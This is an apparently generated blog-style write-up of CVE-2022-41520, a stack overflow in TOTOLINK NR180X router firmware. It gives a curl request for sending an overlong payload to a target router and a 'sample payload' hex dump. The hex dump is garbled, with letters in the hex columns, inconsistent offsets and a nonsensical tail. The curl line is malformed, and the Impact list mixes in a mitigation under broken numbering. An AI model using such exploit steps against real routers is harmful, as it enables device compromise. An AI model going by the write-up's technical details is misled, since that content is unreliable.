CVE-2022-41520 - Exploring the Authenticated Stack Overflow Vulnerability in TOTOLINK NR180X V9.1.u.6279_B20210910

TOTOLINK NR180X V9.1.u.6279_B20210910 is a popular router firmware known for its multiple features and reliable performance. However, a concerning security vulnerability - CVE-2022-41520 - was recently discovered in its core functionality. This vulnerability is an authenticated stack overflow that occurs via the File parameter in the UploadCustomModule function, potentially allowing attackers to execute arbitrary code and compromise the affected system.

In this long-read post, we will delve deeper into this vulnerability, its exploit details, and share code snippets to demonstrate how attackers could potentially leverage this vulnerability.

Original References

Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41520

National Vulnerability Database (NVD) Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-41520

Exploit Details

CVE-2022-41520 is caused by an authenticated stack overflow vulnerability in the TOTOLINK NR180X firmware's UploadCustomModule function. An attacker could exploit this vulnerability by sending a specially crafted HTTP POST request with an overly long File parameter value.

To demonstrate this vulnerability, let's look at the following curl command that could be used to trigger the stack overflow:

curl -X POST 'http://<TARGET_IP>/cgi-bin/index.csp?g_code=xr_httpclick&f_code=settings_uploadcustommodule'; --data-binary '@payload' -H 'Content-Type: application/octet-stream'

In the above command, replace <TARGET_IP> with the IP address of the target TOTOLINK NR180X router, and payload should contain the carefully crafted exploit payload.

Here's a sample payload for PoC that would trigger the stack overflow

00000000: AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  ................................
00000010: AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  ................................
00000020: AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  ................................
...snip...
000003F: AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA  AAAA4141 414143D A00                            ......AAABC...

The payload consists of a series of 'A' characters (x41), followed by the targeted return address. The actual value of the return address will depend on the specific target architecture and memory layout.

Impact

An attacker exploiting this vulnerability could effectively execute arbitrary code on the target system, leading to various negative consequences, such as:

Modifying or deleting vital data.

3. Launching denial-of-service attacks on the router, affecting the network's functionality and performance.

3. Restrict access to the router's administrative interface, allowing only authorized individuals to access it.

Conclusion

In this post, we dissected the CVE-2022-41520 vulnerability, which affects the TOTOLINK NR180X V9.1.u.6279_B20210910 firmware. We discussed the exploit details and demonstrated how an attacker could exploit this authenticated stack overflow vulnerability.

It is crucial to stay up-to-date with the latest firmware and security updates, and follow security best practices to protect your devices and network from such vulnerabilities.

Timeline

Published on: 10/06/2022 18:17:00 UTC
Last modified on: 10/12/2022 03:08:00 UTC